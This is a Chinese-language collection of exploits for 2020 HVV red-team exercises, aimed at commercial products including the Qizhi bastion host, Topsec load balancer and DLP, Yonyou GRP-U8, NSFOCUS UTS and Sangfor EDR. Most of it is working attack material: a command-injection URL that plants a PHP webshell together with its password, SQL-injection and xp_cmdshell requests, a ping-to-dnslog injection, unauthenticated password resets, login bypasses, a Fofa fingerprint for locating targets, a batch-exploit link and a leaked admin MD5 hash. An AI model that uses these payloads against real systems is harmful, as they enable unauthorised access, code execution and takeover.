2020HVV中的漏洞

一、齐治堡垒机前远程命令执行漏洞(CNVD-2019-20835)

1、访问 http://10.20.10.11/listener/cluster_manage.php :返回 “OK”.(未授权无需登录)

2、访问如下链接即可获得getshell,执行成功后,生成PHP一句话马

https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}" ZWNobyAnPD9waHAgQGV2YW

3.getshell访问路径:

/var/www/shterm/resources/qrcode/lbj77.php

https://10.20.10.10/shterm/resources/qrcode/lbj77.php(密码10086)

img

据说还是另外一个版本是java的:

POST /shterm/listener/tui_update.php
a=["t';import os;os.popen('whoami')#"]

img

二、天融信TopApp-LB 负载均衡系统Sql注入漏洞

1.利用POC:

POST /acc/clsf/report/datasource.php HTTP/1.1
Host: localhost
Connection: close
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
t=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,substr('a',1,1),11,12,13,14,15,16,17,18,19,20,21,22-- +&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=@。。

img

2.2个历史漏洞仍然可以复现。

https://www.uedbox.com/post/21626/

用户名随意 密码:;id(天融信负载均衡TopApp-LB系统无需密码直接登陆)

https://www.uedbox.com/post/22193/

用户名: ; ping 9928e5.dnslog.info; echo 密码:任意

img

三、用友GRP-u8 注入

利用POC:

POST /Proxy HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
Host: localhost
Content-Length: 341
Connection: Keep-Alive
Cache-Control: no-cache
cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT> <R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'whoami'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>

img

四、绿盟UTS综合威胁探针管理员任意登录

逻辑漏洞,利用方式参考:https://www.hackbug.net/archives/112.html

1、修改登录数据包 {“status”:false,”mag”:””} -> {“status”:true,”mag”:””}

2、/webapi/v1/system/accountmanage/account接口逻辑错误泄漏了管理员的账户信息包括密码(md5)

3、再次登录,替换密码上个数据包中md5密码

4、登录成功

img

漏洞实际案例:

img

对响应包进行修改,将false更改为true的时候可以泄露管理用户的md5值密码

img

img

利用渠道的md5值去登录页面

img

7ac301836522b54afcbbed714534c7fb

img

五、天融信数据防泄漏系统越权修改管理员密码

无需登录权限,由于修改密码处未校验原密码,且/?module=auth_user&action=mod_edit_pwd,接口未授权访问,造成直接修改任意用户密码,默认superman账户uid为1

POST /?module=auth_user&action=mod_edit_pwd
Cookie: username=superman;
uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1

img

六、WPS Office 图片解析错误导致堆损坏,任意代码执行

看上去(算了看不懂… ,漏洞利用可能导致拒绝服务。

相关参考:

http://zeifan.my/security/rce/heap/2020/09/03/wps-rce-heap.html

七、SANGFOR终端检测响应平台-任意用户登录

fofa指纹:title=”SANGFOR终端检测响应平台”

漏洞利用:

payload:

https://ip/ui/login.php?user=需登录的用户名

列如:

https://1.1.1.1:1980/ui/login.php?user=admin

查询完毕以后即可登录平台。

img

八、某信服EDR漏洞-包含payload

**
**

1.漏洞利用方法:

https://xxx.xxx.xxx/tool/log/c.php?strip_slashes=system&host=whoami

img

2.批量利用方法

网上已经放出批量利用方法了,如下:https://github.com/A2gel/sangfor-edr-exploit
想读更多内容?请进hyck的知识星球查看,内容太多,淦
2020HVV中的漏洞.doc

上传:hyck 7.64 MB 2020/11/29